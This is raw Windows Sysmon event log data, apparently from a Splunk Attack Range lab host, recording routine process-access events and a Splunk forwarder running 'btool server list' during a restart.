13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AC00-00000000A301}2296C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8EE2-6005-AB00-00000000A301}39002608C:\Windows\system32\cmd.exe{59A5CD1D-8EE2-6005-AC00-00000000A301}2296C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.540{59A5CD1D-8EE2-6005-AC00-00000000A301}2296C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE2-6005-AB00-00000000A301}3900C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AB00-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AB00-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EE2-6005-AB00-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1893f|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17106|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1385a|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.535{59A5CD1D-8EE2-6005-AB00-00000000A301}3900C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AA00-00000000A301}4100C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 